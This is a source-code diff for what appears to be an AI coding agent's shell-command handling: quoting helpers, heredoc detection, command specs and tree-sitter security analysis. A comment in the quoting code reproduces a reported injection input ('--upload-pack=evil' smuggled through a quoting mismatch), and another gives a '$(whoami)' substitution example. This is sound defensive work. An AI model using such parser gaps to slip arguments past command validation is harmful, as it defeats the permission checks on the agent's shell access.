+      // Odd trailing \'s = always a bug:
+      //   '\' -> shell-quote: \' = literal ', still open. bash: \, closed.
+      //   'abc\' -> shell-quote: abc then \' = literal ', still open. bash: abc\, closed.
+      //   '\\\'  -> shell-quote: \\ + \', still open. bash: \\\, closed.
+      //
+      // Even trailing \'s = bug ONLY when a later ' exists in the command:
+      //   '\\' alone -> shell-quote backtracks, both parsers agree string closes. OK.
+      //   '\\' 'next' -> shell-quote: \' consumes the closing ', finds next ' as
+      //                   false close, merges tokens. bash: two separate tokens.
+      //
+      //   Detail: the regex alternation tries \' before [^']. For '\\', it matches
+      //   the first \ via [^'] (next char is \, not '), then the second \ via \'
+      //   (next char IS '). This consumes the closing '. The regex continues reading
+      //   until it finds another ' to close the match. If none exists, it backtracks
+      //   to [^'] for the second \ and closes correctly. If a later ' exists (e.g.,
+      //   the opener of the next single-quoted arg), no backtracking occurs and
+      //   tokens merge. See H1 report: git ls-remote 'safe\\' '--upload-pack=evil' 'repo'
+      //   shell-quote: ["git","ls-remote","safe\\\\ --upload-pack=evil repo"]
+      //   bash:        ["git","ls-remote","safe\\\\","--upload-pack=evil","repo"]
+      if (!inSingleQuote) {
+        let backslashCount = 0
+        let j = i - 1
+        while (j >= 0 && command[j] === '\\') {
+          backslashCount++
+          j--
+        }
+        if (backslashCount > 0 && backslashCount % 2 === 1) {
+          return true
+        }
+        // Even trailing backslashes: only a bug when a later ' exists that
+        // the chunker regex can use as a false closing quote. We check for
+        // ANY later ' because the regex doesn't respect bash quote state
+        // (e.g., a ' inside double quotes is also consumable).
+        if (
+          backslashCount > 0 &&
+          backslashCount % 2 === 0 &&
+          command.indexOf("'", i + 1) !== -1
+        ) {
+          return true
+        }
+      }
+      continue
+    }
+  }
+
+  return false
+}
+
+export function quote(args: ReadonlyArray<unknown>): string {
+  // First try the strict validation
+  const result = tryQuoteShellArgs([...args])
+
+  if (result.success) {
+    return result.quoted
+  }
+
+  // If strict validation failed, use lenient fallback
+  // This handles objects, symbols, functions, etc. by converting them to strings
+  try {
+    const stringArgs = args.map(arg => {
+      if (arg === null || arg === undefined) {
+        return String(arg)
+      }
+
+      const type = typeof arg
+
+      if (type === 'string' || type === 'number' || type === 'boolean') {
+        return String(arg)
+      }
+
+      // For unsupported types, use JSON.stringify as a safe fallback
+      // This ensures we don't crash but still get a meaningful representation
+      return jsonStringify(arg)
+    })
+
+    return shellQuoteQuote(stringArgs)
+  } catch (error) {
+    // SECURITY: Never use JSON.stringify as a fallback for shell quoting.
+    // JSON.stringify uses double quotes which don't prevent shell command execution.
+    // For example, jsonStringify(['echo', '$(whoami)']) produces "echo" "$(whoami)"
+    if (error instanceof Error) {
+      logError(error)
+    }
+    throw new Error('Failed to quote shell arguments safely')
+  }
+}
@@ -0,0 +1,128 @@
+import { quote } from './shellQuote.js'
+
+/**
+ * Detects if a command contains a heredoc pattern
+ * Matches patterns like: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF, etc.
+ */
+function containsHeredoc(command: string): boolean {
+  // Match heredoc patterns: << followed by optional -, then optional quotes or backslash, then word
+  // Matches: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF
+  // Check for bit-shift operators first and exclude them
+  if (
+    /\d\s*<<\s*\d/.test(command) ||
+    /\[\[\s*\d+\s*<<\s*\d+\s*\]\]/.test(command) ||
+    /\$\(\(.*<<.*\)\)/.test(command)
+  ) {
+    return false
+  }
+
+  // Now check for heredoc patterns
+  const heredocRegex = /<<-?\s*(?:(['"]?)(\w+)\1|\\(\w+))/
+  return heredocRegex.test(command)
+}
+
+/**
+ * Detects if a command contains multiline strings in quotes
+ */
+function containsMultilineString(command: string): boolean {
+  // Check for strings with actual newlines in them
+  // Handle escaped quotes by using a more sophisticated pattern
+  // Match single quotes: '...\n...' where content can include escaped quotes \'
+  // Match double quotes: "...\n..." where content can include escaped quotes \"
+  const singleQuoteMultiline = /'(?:[^'\\]|\\.)*\n(?:[^'\\]|\\.)*'/
+  const doubleQuoteMultiline = /"(?:[^"\\]|\\.)*\n(?:[^"\\]|\\.)*"/
+
+  return (
+    singleQuoteMultiline.test(command) || doubleQuoteMultiline.test(command)
+  )
+}
+
+/**
+ * Quotes a shell command appropriately, preserving heredocs and multiline strings
+ * @param command The command to quote
+ * @param addStdinRedirect Whether to add < /dev/null
+ * @returns The properly quoted command
+ */
+export function quoteShellCommand(
+  command: string,
+  addStdinRedirect: boolean = true,
+): string {
+  // If command contains heredoc or multiline strings, handle specially
+  // The shell-quote library incorrectly escapes ! to \! in these cases
+  if (containsHeredoc(command) || containsMultilineString(command)) {
+    // For heredocs and multiline strings, we need to quote for eval
+    // but avoid shell-quote's aggressive escaping
+    // We'll use single quotes and escape only single quotes in the command
+    const escaped = command.replace(/'/g, "'\"'\"'")
+    const quoted = `'${escaped}'`
+
+    // Don't add stdin redirect for heredocs as they provide their own input
+    if (containsHeredoc(command)) {
+      return quoted
+    }
+
+    // For multiline strings without heredocs, add stdin redirect if needed
+    return addStdinRedirect ? `${quoted} < /dev/null` : quoted
+  }
+
+  // For regular commands, use shell-quote
+  if (addStdinRedirect) {
+    return quote([command, '<', '/dev/null'])
+  }
+
+  return quote([command])
+}
+
+/**
+ * Detects if a command already has a stdin redirect
+ * Match patterns like: < file, </path/to/file, < /dev/null, etc.
+ * But not <<EOF (heredoc), << (bit shift), or <(process substitution)
+ */
+export function hasStdinRedirect(command: string): boolean {
+  // Look for < followed by whitespace and a filename/path
+  // Negative lookahead to exclude: <<, <(
+  // Must be preceded by whitespace or command separator or start of string
+  return /(?:^|[\s;&|])<(?![<(])\s*\S+/.test(command)
+}
+
+/**
+ * Checks if stdin redirect should be added to a command
+ * @param command The command to check
+ * @returns true if stdin redirect can be safely added
+ */
+export function shouldAddStdinRedirect(command: string): boolean {
+  // Don't add stdin redirect for heredocs as it interferes with the heredoc terminator
+  if (containsHeredoc(command)) {
+    return false
+  }
+
+  // Don't add stdin redirect if command already has one
+  if (hasStdinRedirect(command)) {
+    return false
+  }
+
+  // For other commands, stdin redirect is generally safe
+  return true
+}
+
+/**
+ * Rewrites Windows CMD-style `>nul` redirects to POSIX `/dev/null`.
+ *
+ * The model occasionally hallucinates Windows CMD syntax (e.g., `ls 2>nul`)
+ * even though our bash shell is always POSIX (Git Bash / WSL on Windows).
+ * When Git Bash sees `2>nul`, it creates a literal file named `nul` — a
+ * Windows reserved device name that is extremely hard to delete and breaks
+ * `git add .` and `git clone`. See anthropics/claude-code#4928.
+ *
+ * Matches: `>nul`, `> NUL`, `2>nul`, `&>nul`, `>>nul` (case-insensitive)
+ * Does NOT match: `>null`, `>nullable`, `>nul.txt`, `cat nul.txt`
+ *
+ * Limitation: this regex does not parse shell quoting, so `echo ">nul"`
+ * will also be rewritten. This is acceptable collateral — it's extremely
+ * rare and rewriting to `/dev/null` inside a string is harmless.
+ */
+const NUL_REDIRECT_REGEX = /(\d?&?>+\s*)[Nn][Uu][Ll](?=\s|$|[|&;)\n])/g
+
+export function rewriteWindowsNullRedirect(command: string): string {
+  return command.replace(NUL_REDIRECT_REGEX, '$1/dev/null')
+}
@@ -0,0 +1,14 @@
+import type { CommandSpec } from '../registry.js'
+
+const alias: CommandSpec = {
+  name: 'alias',
+  description: 'Create or list command aliases',
+  args: {
+    name: 'definition',
+    description: 'Alias definition in the form name=value',
+    isOptional: true,
+    isVariadic: true,
+  },
+}
+
+export default alias
@@ -0,0 +1,18 @@
+import type { CommandSpec } from '../registry.js'
+import alias from './alias.js'
+import nohup from './nohup.js'
+import pyright from './pyright.js'
+import sleep from './sleep.js'
+import srun from './srun.js'
+import time from './time.js'
+import timeout from './timeout.js'
+
+export default [
+  pyright,
+  timeout,
+  sleep,
+  alias,
+  nohup,
+  time,
+  srun,
+] satisfies CommandSpec[]
@@ -0,0 +1,13 @@
+import type { CommandSpec } from '../registry.js'
+
+const nohup: CommandSpec = {
+  name: 'nohup',
+  description: 'Run a command immune to hangups',
+  args: {
+    name: 'command',
+    description: 'Command to run with nohup',
+    isCommand: true,
+  },
+}
+
+export default nohup
@@ -0,0 +1,91 @@
+import type { CommandSpec } from '../registry.js'
+
+export default {
+  name: 'pyright',
+  description: 'Type checker for Python',
+  options: [
+    { name: ['--help', '-h'], description: 'Show help message' },
+    { name: '--version', description: 'Print pyright version and exit' },
+    {
+      name: ['--watch', '-w'],
+      description: 'Continue to run and watch for changes',
+    },
+    {
+      name: ['--project', '-p'],
+      description: 'Use the configuration file at this location',
+      args: { name: 'FILE OR DIRECTORY' },
+    },
+    { name: '-', description: 'Read file or directory list from stdin' },
+    {
+      name: '--createstub',
+      description: 'Create type stub file(s) for import',
+      args: { name: 'IMPORT' },
+    },
+    {
+      name: ['--typeshedpath', '-t'],
+      description: 'Use typeshed type stubs at this location',
+      args: { name: 'DIRECTORY' },
+    },
+    {
+      name: '--verifytypes',
+      description: 'Verify completeness of types in py.typed package',
+      args: { name: 'IMPORT' },
+    },
+    {
+      name: '--ignoreexternal',
+      description: 'Ignore external imports for --verifytypes',
+    },
+    {
+      name: '--pythonpath',
+      description: 'Path to the Python interpreter',
+      args: { name: 'FILE' },
+    },
+    {
+      name: '--pythonplatform',
+      description: 'Analyze for platform',
+      args: { name: 'PLATFORM' },
+    },
+    {
+      name: '--pythonversion',
+      description: 'Analyze for Python version',
+      args: { name: 'VERSION' },
+    },
+    {
+      name: ['--venvpath', '-v'],
+      description: 'Directory that contains virtual environments',
+      args: { name: 'DIRECTORY' },
+    },
+    { name: '--outputjson', description: 'Output results in JSON format' },
+    { name: '--verbose', description: 'Emit verbose diagnostics' },
+    { name: '--stats', description: 'Print detailed performance stats' },
+    {
+      name: '--dependencies',
+      description: 'Emit import dependency information',
+    },
+    {
+      name: '--level',
+      description: 'Minimum diagnostic level',
+      args: { name: 'LEVEL' },
+    },
+    {
+      name: '--skipunannotated',
+      description: 'Skip type analysis of unannotated functions',
+    },
+    {
+      name: '--warnings',
+      description: 'Use exit code of 1 if warnings are reported',
+    },
+    {
+      name: '--threads',
+      description: 'Use up to N threads to parallelize type checking',
+      args: { name: 'N', isOptional: true },
+    },
+  ],
+  args: {
+    name: 'files',
+    description:
+      'Specify files or directories to analyze (overrides config file)',
+    isVariadic: true,
+    isOptional: true,
+  },
+} satisfies CommandSpec
@@ -0,0 +1,13 @@
+import type { CommandSpec } from '../registry.js'
+
+const sleep: CommandSpec = {
+  name: 'sleep',
+  description: 'Delay for a specified amount of time',
+  args: {
+    name: 'duration',
+    description: 'Duration to sleep (seconds or with suffix like 5s, 2m, 1h)',
+    isOptional: false,
+  },
+}
+
+export default sleep
@@ -0,0 +1,31 @@
+import type { CommandSpec } from '../registry.js'
+
+const srun: CommandSpec = {
+  name: 'srun',
+  description: 'Run a command on SLURM cluster nodes',
+  options: [
+    {
+      name: ['-n', '--ntasks'],
+      description: 'Number of tasks',
+      args: {
+        name: 'count',
+        description: 'Number of tasks to run',
+      },
+    },
+    {
+      name: ['-N', '--nodes'],
+      description: 'Number of nodes',
+      args: {
+        name: 'count',
+        description: 'Number of nodes to allocate',
+      },
+    },
+  ],
+  args: {
+    name: 'command',
+    description: 'Command to run on the cluster',
+    isCommand: true,
+  },
+}
+
+export default srun
@@ -0,0 +1,13 @@
+import type { CommandSpec } from '../registry.js'
+
+const time: CommandSpec = {
+  name: 'time',
+  description: 'Time a command',
+  args: {
+    name: 'command',
+    description: 'Command to time',
+    isCommand: true,
+  },
+}
+
+export default time
@@ -0,0 +1,20 @@
+import type { CommandSpec } from '../registry.js'
+
+const timeout: CommandSpec = {
+  name: 'timeout',
+  description: 'Run a command with a time limit',
+  args: [
+    {
+      name: 'duration',
+      description: 'Duration to wait before timing out (e.g., 10, 5s, 2m)',
+      isOptional: false,
+    },
+    {
+      name: 'command',
+      description: 'Command to run',
+      isCommand: true,
+    },
+  ],
+}
+
+export default timeout
@@ -0,0 +1,506 @@
+/**
+ * Tree-sitter AST analysis utilities for bash command security validation.
+ *
+ * These functions extract security-relevant information from tree-sitter
+ * parse trees, providing more accurate analysis than regex/shell-quote
+ * parsing. Each function takes a root node and command string, and returns
+ * structured data that can be used by security validators.
+ *
+ * The native NAPI parser returns plain JS objects — no cleanup needed.
+ */
+
+type TreeSitterNode = {
+  type: string
+  text: string
+  startIndex: number
+  endIndex: number
+  children: TreeSitterNode[]
+  childCount: number
+}
+
+export type QuoteContext = {
+  /** Command text with single-quoted content removed (double-quoted content preserved) */
+  withDoubleQuotes: string
+  /** Command text with all quoted content removed */
+  fullyUnquoted: string
+  /** Like fullyUnquoted but preserves quote characters (', ") */
+  unquotedKeepQuoteChars: string
+}
+
+export type CompoundStructure = {
+  /** Whether the command has compound operators (&&, ||, ;) at the top level */
+  hasCompoundOperators: boolean
+  /** Whether the command has pipelines */
+  hasPipeline: boolean
+  /** Whether the command has subshells */
+  hasSubshell: boolean
+  /** Whether the command has command groups ({...}) */
+  hasCommandGroup: boolean
+  /** Top-level compound operator types found */
+  operators: string[]
+  /** Individual command segments split by compound operators */
+  segments: string[]
+}
+
+export type DangerousPatterns = {
+  /** Has $() or backtick command substitution (outside quotes that would make it safe) */
+  hasCommandSubstitution: boolean
+  /** Has <() or >() process substitution */
+  hasProcessSubstitution: boolean
+  /** Has ${...} parameter expansion */
+  hasParameterExpansion: boolean
+  /** Has heredoc */
+  hasHeredoc: boolean
+  /** Has comment */
+  hasComment: boolean
+}
+
+export type TreeSitterAnalysis = {
+  quoteContext: QuoteContext
+  compoundStructure: CompoundStructure
+  /** Whether actual operator nodes (;, &&, ||) exist — if false, \; is just a word argument */
+  hasActualOperatorNodes: boolean
+  dangerousPatterns: DangerousPatterns
+}
+
+type QuoteSpans = {
+  raw: Array<[number, number]> // raw_string (single-quoted)
+  ansiC: Array<[number, number]> // ansi_c_string ($'...')
+  double: Array<[number, number]> // string (double-quoted)
+  heredoc: Array<[number, number]> // quoted heredoc_redirect
+}
+
+/**
+ * Single-pass collection of all quote-related spans.
+ * Previously this was 5 separate tree walks (one per type-set plus
+ * allQuoteTypes plus heredoc); fusing cuts tree-traversal ~5x.
+ *
+ * Replicates the per-type walk semantics: each original walk stopped at
+ * its own type. So the raw_string walk would recurse THROUGH a string
+ * node (not its type) to reach nested raw_string inside $(...), but the
+ * string walk would stop at the outer string. We track `inDouble` to
+ * collect the *outermost* string span per path, while still descending
+ * into $()/${} bodies to pick up inner raw_string/ansi_c_string.
+ *
+ * raw_string / ansi_c_string / quoted-heredoc bodies are literal text
+ * in bash (no expansion), so no nested quote nodes exist — return early.
+ */
+function collectQuoteSpans(
+  node: TreeSitterNode,
+  out: QuoteSpans,
+  inDouble: boolean,
+): void {
+  switch (node.type) {
+    case 'raw_string':
+      out.raw.push([node.startIndex, node.endIndex])
+      return // literal body, no nested quotes possible
+    case 'ansi_c_string':
+      out.ansiC.push([node.startIndex, node.endIndex])
+      return // literal body
+    case 'string':
+      // Only collect the outermost string (matches old per-type walk
+      // which stops at first match). Recurse regardless — a nested
+      // $(cmd 'x') inside "..." has a real inner raw_string.
+      if (!inDouble) out.double.push([node.startIndex, node.endIndex])
+      for (const child of node.children) {
+        if (child) collectQuoteSpans(child, out, true)
+      }
+      return
+    case 'heredoc_redirect': {
+      // Quoted heredocs (<<'EOF', <<"EOF", <<\EOF): literal body.
+      // Unquoted (<<EOF) expands $()/${} — the body can contain
+      // $(cmd 'x') whose inner '...' IS a real raw_string node.
+      // Detection: heredoc_start text starts with '/"/\\
+      // Matches sync path's extractHeredocs({ quotedOnly: true }).
+      let isQuoted = false
+      for (const child of node.children) {
+        if (child && child.type === 'heredoc_start') {
+          const first = child.text[0]
+          isQuoted = first === "'" || first === '"' || first === '\\'
+          break
+        }
+      }
+      if (isQuoted) {
+        out.heredoc.push([node.startIndex, node.endIndex])
+        return // literal body, no nested quote nodes
+      }
+      // Unquoted: recurse into heredoc_body → command_substitution →
+      // inner quote nodes. The original per-type walks did NOT stop at
+      // heredoc_redirect (not in their type sets), so they recursed here.
+      break
+    }
+  }
+
+  for (const child of node.children) {
+    if (child) collectQuoteSpans(child, out, inDouble)
+  }
+}
+
+/**
+ * Builds a Set of all character positions covered by the given spans.
+ */
+function buildPositionSet(spans: Array<[number, number]>): Set<number> {
+  const set = new Set<number>()
+  for (const [start, end] of spans) {
+    for (let i = start; i < end; i++) {
+      set.add(i)
+    }
+  }
+  return set
+}
+
+/**
+ * Drops spans that are fully contained within another span, keeping only the
+ * outermost. Nested quotes (e.g., `"$(echo 'hi')"`) yield overlapping spans
+ * — the inner raw_string is found by recursing into the outer string node.
+ * Processing overlapping spans corrupts indices since removing/replacing the
+ * outer span shifts the inner span's start/end into stale positions.
+ */
+function dropContainedSpans<T extends readonly [number, number, ...unknown[]]>(
+  spans: T[],
+): T[] {
+  return spans.filter(
+    (s, i) =>
+      !spans.some(
+        (other, j) =>
+          j !== i &&
+          other[0] <= s[0] &&
+          other[1] >= s[1] &&
+          (other[0] < s[0] || other[1] > s[1]),
+      ),
+  )
+}
+
+/**
+ * Removes spans from a string, returning the string with those character
+ * ranges removed.
+ */
+function removeSpans(command: string, spans: Array<[number, number]>): string {
+  if (spans.length === 0) return command
+
+  // Drop inner spans that are fully contained in an outer one, then sort by
+  // start index descending so we can splice without offset shifts.
+  const sorted = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
+  let result = command
+  for (const [start, end] of sorted) {
+    result = result.slice(0, start) + result.slice(end)
+  }
+  return result
+}
+
+/**
+ * Replaces spans with just the quote delimiters (preserving ' and " characters).
+ */
+function replaceSpansKeepQuotes(
+  command: string,
+  spans: Array<[number, number, string, string]>,
+): string {
+  if (spans.length === 0) return command
+
+  const sorted = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
+  let result = command
+  for (const [start, end, open, close] of sorted) {
+    // Replace content but keep the quote delimiters
+    result = result.slice(0, start) + open + close + result.slice(end)
+  }
+  return result
+}
+
+/**
+ * Extract quote context from the tree-sitter AST.
+ * Replaces the manual character-by-character extractQuotedContent() function.
+ *
+ * Tree-sitter node types:
+ * - raw_string: single-quoted ('...')
+ * - string: double-quoted ("...")
+ * - ansi_c_string: ANSI-C quoting ($'...') — span includes the leading $
+ * - heredoc_redirect: QUOTED heredocs only (<<'EOF', <<"EOF", <<\EOF) —
+ *   the full redirect span (<<, delimiters, body, newlines) is stripped
+ *   since the body is literal text in bash (no expansion). UNQUOTED
+ *   heredocs (<<EOF) are left in place since bash expands $(...)/${...}
+ *   inside them, and validators need to see those patterns. Matches the
+ *   sync path's extractHeredocs({ quotedOnly: true }).
+ */
+export function extractQuoteContext(
+  rootNode: unknown,
+  command: string,
+): QuoteContext {
+  // Single walk collects all quote span types at once.
+  const spans: QuoteSpans = { raw: [], ansiC: [], double: [], heredoc: [] }
+  collectQuoteSpans(rootNode as TreeSitterNode, spans, false)
+  const singleQuoteSpans = spans.raw
+  const ansiCSpans = spans.ansiC
+  const doubleQuoteSpans = spans.double
+  const quotedHeredocSpans = spans.heredoc
+  const allQuoteSpans = [
+    ...singleQuoteSpans,
+    ...ansiCSpans,
+    ...doubleQuoteSpans,
+    ...quotedHeredocSpans,
+  ]
+
+  // Build a set of positions that should be excluded for each output variant.
+  // For withDoubleQuotes: remove single-quoted spans entirely, plus the
+  // opening/closing `"` delimiters of double-quoted spans (but keep the
+  // content between them). This matches the regex extractQuotedContent()
+  // semantics where `"` toggles quote state but content is still emitted.
+  const singleQuoteSet = buildPositionSet([
+    ...singleQuoteSpans,
+    ...ansiCSpans,
+    ...quotedHeredocSpans,
+  ])
+  const doubleQuoteDelimSet = new Set<number>()
+  for (const [start, end] of doubleQuoteSpans) {
+    doubleQuoteDelimSet.add(start) // opening "
+    doubleQuoteDelimSet.add(end - 1) // closing "
+  }
+  let withDoubleQuotes = ''
+  for (let i = 0; i < command.length; i++) {
+    if (singleQuoteSet.has(i)) continue
+    if (doubleQuoteDelimSet.has(i)) continue
+    withDoubleQuotes += command[i]
+  }
+
+  // fullyUnquoted: remove all quoted content
+  const fullyUnquoted = removeSpans(command, allQuoteSpans)
+
+  // unquotedKeepQuoteChars: remove content but keep delimiter chars
+  const spansWithQuoteChars: Array<[number, number, string, string]> = []
+  for (const [start, end] of singleQuoteSpans) {
+    spansWithQuoteChars.push([start, end, "'", "'"])
+  }
+  for (const [start, end] of ansiCSpans) {
+    // ansi_c_string spans include the leading $; preserve it so this
+    // matches the regex path, which treats $ as unquoted preceding '.
+    spansWithQuoteChars.push([start, end, "$'", "'"])
+  }
+  for (const [start, end] of doubleQuoteSpans) {
+    spansWithQuoteChars.push([start, end, '"', '"'])
+  }
+  for (const [start, end] of quotedHeredocSpans) {
+    // Heredoc redirect spans have no inline quote delimiters — strip entirely.
+    spansWithQuoteChars.push([start, end, '', ''])
+  }
+  const unquotedKeepQuoteChars = replaceSpansKeepQuotes(
+    command,
+    spansWithQuoteChars,
+  )
+
+  return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
+}
+
+/**
+ * Extract compound command structure from the AST.
+ * Replaces isUnsafeCompoundCommand() and splitCommand() for tree-sitter path.
+ */
+export function extractCompoundStructure(
+  rootNode: unknown,
+  command: string,
+): CompoundStructure {
+  const n = rootNode as TreeSitterNode
+  const operators: string[] = []
+  const segments: string[] = []
+  let hasSubshell = false
+  let hasCommandGroup = false
+  let hasPipeline = false
+
+  // Walk top-level children of the program node
+  function walkTopLevel(node: TreeSitterNode): void {
+    for (const child of node.children) {
+      if (!child) continue
+
+      if (child.type === 'list') {
+        // list nodes contain && and || operators
+        for (const listChild of child.children) {
+          if (!listChild) continue
+          if (listChild.type === '&&' || listChild.type === '||') {
+            operators.push(listChild.type)
+          } else if (
+            listChild.type === 'list' ||
+            listChild.type === 'redirected_statement'
+          ) {
+            // Nested list, or redirected_statement wrapping a list/pipeline —
+            // recurse so inner operators/pipelines are detected. For
+            // `cmd1 && cmd2 2>/dev/null && cmd3`, the redirected_statement
+            // wraps `list(cmd1 && cmd2)` — the inner `&&` would be missed
+            // without recursion.
+            walkTopLevel({ ...node, children: [listChild] } as TreeSitterNode)
+          } else if (listChild.type === 'pipeline') {
+            hasPipeline = true
+            segments.push(listChild.text)
+          } else if (listChild.type === 'subshell') {
+            hasSubshell = true
+            segments.push(listChild.text)
+          } else if (listChild.type === 'compound_statement') {
+            hasCommandGroup = true
+            segments.push(listChild.text)
+          } else {
+            segments.push(listChild.text)
+          }
+        }
+      } else if (child.type === ';') {
+        operators.push(';')
+      } else if (child.type === 'pipeline') {
+        hasPipeline = true
+        segments.push(child.text)
+      } else if (child.type === 'subshell') {
+        hasSubshell = true
+        segments.push(child.text)
+      } else if (child.type === 'compound_statement') {
+        hasCommandGroup = true
+        segments.push(child.text)
+      } else if (
+        child.type === 'command' ||
+        child.type === 'declaration_command' ||
+        child.type === 'variable_assignment'
+      ) {
+        segments.push(child.text)
+      } else if (child.type === 'redirected_statement') {
+        // `cd ~/src && find path 2>/dev/null` — tree-sitter wraps the ENTIRE
+        // compound in a redirected_statement: program → redirected_statement →
+        // (list → cmd1, &&, cmd2) + file_redirect. Same for `cmd1 | cmd2 > out`
+        // (wraps pipeline) and `(cmd) > out` (wraps subshell). Recurse to
+        // detect the inner structure; skip file_redirect children (redirects
+        // don't affect compound/pipeline classification).
+        let foundInner = false
+        for (const inner of child.children) {
+          if (!inner || inner.type === 'file_redirect') continue
+          foundInner = true
+          walkTopLevel({ ...child, children: [inner] } as TreeSitterNode)
+        }
+        if (!foundInner) {
+          // Standalone redirect with no body (shouldn't happen, but fail-safe)
+          segments.push(child.text)
+        }
+      } else if (child.type === 'negated_command') {
+        // `! cmd` — recurse into the inner command so its structure is
+        // classified (pipeline/subshell/etc.), but also record the full
+        // negated text as a segment so segments.length stays meaningful.
+        segments.push(child.text)
+        walkTopLevel(child)
+      } else if (
+        child.type === 'if_statement' ||
+        child.type === 'while_statement' ||
+        child.type === 'for_statement' ||
+        child.type === 'case_statement' ||
+        child.type === 'function_definition'
+      ) {
+        // Control-flow constructs: the construct itself is one segment,
+        // but recurse so inner pipelines/subshells/operators are detected.
+        segments.push(child.text)
+        walkTopLevel(child)
+      }
+    }
+  }
+
+  walkTopLevel(n)
+
+  // If no segments found, the whole command is one segment
+  if (segments.length === 0) {
+    segments.push(command)
+  }
+
+  return {
+    hasCompoundOperators: operators.length > 0,
+    hasPipeline,
+    hasSubshell,
+    hasCommandGroup,
+    operators,
+    segments,
+  }
+}
+
+/**
+ * Check whether the AST contains actual operator nodes (;, &&, ||).
+ *
+ * This is the key function for eliminating the `find -exec \;` false positive.
+ * Tree-sitter parses `\;` as part of a `word` node (an argument to find),
+ * NOT as a `;` operator. So if no actual `;` operator nodes exist in the AST,
+ * there are no compound operators and hasBackslashEscapedOperator() can be skipped.
+ */
+export function hasActualOperatorNodes(rootNode: unknown): boolean {
+  const n = rootNode as TreeSitterNode
+
+  function walk(node: TreeSitterNode): boolean {
+    // Check for operator types that indicate compound commands
+    if (node.type === ';' || node.type === '&&' || node.type === '||') {
+      // Verify this is a child of a list or program, not inside a command
+      return true
+    }
+
+    if (node.type === 'list') {
+      // A list node means there are compound operators
+      return true
+    }
+
+    for (const child of node.children) {
+      if (child && walk(child)) return true
+    }
+    return false
+  }
+
+  return walk(n)
+}
+
+/**
+ * Extract dangerous pattern information from the AST.
+ */
+export function extractDangerousPatterns(rootNode: unknown): DangerousPatterns {
+  const n = rootNode as TreeSitterNode
+  let hasCommandSubstitution = false
+  let hasProcessSubstitution = false
+  let hasParameterExpansion = false
+  let hasHeredoc = false
+  let hasComment = false
+
+  function walk(node: TreeSitterNode): void {
+    switch (node.type) {
+      case 'command_substitution':
+        hasCommandSubstitution = true
+        break
+      case 'process_substitution':
+        hasProcessSubstitution = true
+        break
+      case 'expansion':
+        hasParameterExpansion = true
+        break
+      case 'heredoc_redirect':
+        hasHeredoc = true
+        break
+      case 'comment':
+        hasComment = true
+        break
+    }
+
+    for (const child of node.children) {
+      if (child) walk(child)
+    }
+  }
+
+  walk(n)
+
+  return {
+    hasCommandSubstitution,
+    hasProcessSubstitution,
+    hasParameterExpansion,
+    hasHeredoc,
+    hasComment,
+  }
+}
+
+/**
+ * Perform complete tree-sitter analysis of a command.
+ * Extracts all security-relevant data from the AST in one pass.
+ * This data must be extracted before tree.delete() is called.
+ */
+export function analyzeCommand(
+  rootNode: unknown,
+  command: string,
+): TreeSitterAnalysis {
+  return {
+    quoteContext: extractQuoteContext(rootNode, command),
+    compoundStructure: extractCompoundStructure(rootNode, command),
+    hasActualOperatorNodes: hasActualOperatorNodes(rootNode),
+    dangerousPatterns: extractDangerousPatterns(rootNode),
+  }
+}